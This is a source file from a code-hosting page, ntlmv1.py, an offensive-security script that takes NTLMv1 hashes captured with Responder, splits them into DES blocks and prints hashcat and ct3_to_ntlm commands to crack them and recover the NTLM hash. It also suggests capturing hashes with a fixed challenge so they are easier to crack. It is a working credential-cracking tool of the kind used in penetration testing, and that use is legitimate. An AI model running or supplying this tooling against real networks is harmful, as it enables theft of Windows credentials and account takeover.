-
Notifications
You must be signed in to change notification settings - Fork 96
/
Copy pathntlmv1.py
125 lines (109 loc) · 5.48 KB
/
ntlmv1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
import hashlib, binascii
import argparse
import json
parser = argparse.ArgumentParser()
parser.add_argument('--ntlmv1', help='NTLMv1 Hash in responder format', required=True)
parser.add_argument('--hashcat', help='hashcat path, eg: ~/git/hashcat', required=False)
parser.add_argument('--hcutils', help='hashcat-utils path, eg: ~/git/hashcat-utils', required=False)
parser.add_argument('--json', help='if this is set to anything it will output json, eg: --json 1', required=False)
args = parser.parse_args()
# SERVER1$::MOG:7EF3F506F5EA510E00000000000000000000000000000000:1217169BD7BE0270A033899BD440016D3E6DACAF5894D504:ff81dfd6b12c269d
# evilmog::DUSTIN-5AA37877:E343946E455EFC72746CF587C42022982F85252CC731BB25:51A539E6EE061F647CD5D48CE6C686653737C5E1DE26AC4C:1122334455667788
hashsplit = args.ntlmv1.split(':')
challenge = hashsplit[5]
lmresp = hashsplit[3]
ntresp = hashsplit[4]
ct3 = ntresp[32:48]
data = {'ntlmv1': args.ntlmv1, 'user': hashsplit[0], 'domain': hashsplit[2], 'challenge': challenge, 'lmresp': lmresp,
'ntresp': ntresp, 'ct3': ct3}
if lmresp[20:48] != "0000000000000000000000000000":
ct1 = ntresp[0:16]
ct2 = ntresp[16:32]
ct3 = ntresp[32:48]
if args.json is None:
print("Hashfield Split:")
print(str(hashsplit) + "\n")
print("Hostname: " + hashsplit[2])
print("Username: " + hashsplit[0])
print("Challenge: " + challenge)
print("LM Response: " + lmresp)
print("NT Response: " + ntresp)
print("CT1: " + ct1)
print("CT2: " + ct2)
print("CT3: " + ct3 + "\n")
print("To Calculate final 4 characters of NTLM hash use:")
if args.hcutils:
print(args.hcutils + "/ct3_to_ntlm.bin " + ct3 + " " + challenge + "\n")
else:
print("./ct3_to_ntlm.bin " + ct3 + " " + challenge + "\n")
# ./ct3_to_ntlm.bin 2e1e4bf33006ba41 cb8086049ec4736c
print("To crack with hashcat create a file with the following contents:")
print(ct1 + ":" + challenge)
print(ct2 + ":" + challenge + "\n")
print("echo \"" + ct1 + ":" + challenge + "\">>14000.hash")
print("echo \"" + ct2 + ":" + challenge + "\">>14000.hash\n")
print("To crack with hashcat:")
if args.hashcat:
print(
args.hashcat + "/hashcat -m 14000 -a 3 -1 " + args.hashcat + "/charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1\n")
else:
print("./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1\n")
if lmresp[20:48] == "0000000000000000000000000000":
clientchallenge = hashsplit[5]
combinedchallenge = clientchallenge + lmresp[0:16]
m = hashlib.md5()
m.update(binascii.unhexlify(combinedchallenge))
md5hash = m.hexdigest()
srvchallenge = md5hash[0:16]
data['srvchallenge'] = srvchallenge
ct1 = ntresp[0:16]
ct2 = ntresp[16:32]
if args.json == None:
print(
"Hash response is ESS, consider using responder with --lm or --disable-ess with a static challenge of 1122334455667788")
print("[-] Client Challenge: " + clientchallenge)
print("[-] LMResp[0:16]: " + lmresp[0:16])
print("[-] Combined Challenge: " + combinedchallenge)
print("Hashfield Split:")
print(str(hashsplit) + "\n")
print("[-] MD5 Hash of Combined Challenge: " + md5hash)
print("Hostname: " + hashsplit[2])
print("Username: " + hashsplit[0])
print("LM Response: " + lmresp)
print("NT Response: " + ntresp)
print("SRV Challenge: " + srvchallenge + "\n")
print("To Calculate final 4 characters of NTLM hash use:")
# ./ct3_to_ntlm.bin 2e1e4bf33006ba41 cb8086049ec4736c 338d08f8e26de93300000000000000000000000000000000
if args.hcutils:
print(args.hcutils + "/ct3_to_ntlm.bin " + ct3 + " " + clientchallenge + " " + lmresp + "\n")
else:
print("./ct3_to_ntlm.bin " + ct3 + " " + clientchallenge + " " + lmresp + "\n")
print("To crack with hashcat create a file with the following contents:")
print(ct1 + ":" + srvchallenge)
print(ct2 + ":" + srvchallenge + "\n")
print("echo \"" + ct1 + ":" + srvchallenge + "\">>14000.hash")
print("echo \"" + ct2 + ":" + srvchallenge + "\">>14000.hash\n")
print("To crack with hashcat:")
if args.hashcat:
print(
args.hashcat + "/hashcat -m 14000 -a 3 -1 " + args.hashcat + "/charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1\n")
else:
print("./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1\n")
if args.json != None:
if lmresp[20:48] != "0000000000000000000000000000":
if args.hcutils:
data['ct3_crack'] = (args.hcutils + "/ct3_to_ntlm.bin " + ct3 + " " + challenge)
else:
data['ct3_crack'] = ("ct3_to_ntlm.bin " + ct3 + " " + challenge)
data['hash1'] = (ct1 + ":" + challenge)
data['hash2'] = (ct2 + ":" + challenge)
if lmresp[20:48] == "0000000000000000000000000000":
if args.hcutils:
data['ct3_crack'] = (args.hcutils + "/ct3_to_ntlm.bin " + ct3 + " " + clientchallenge + " " + lmresp)
else:
data['ct3_crack'] = ("ct3_to_ntlm.bin " + ct3 + " " + clientchallenge + " " + lmresp)
data['hash1'] = (ct1 + ":" + srvchallenge)
data['hash2'] = (ct2 + ":" + srvchallenge)
# process data
json_data = json.dumps(data)
print(json_data)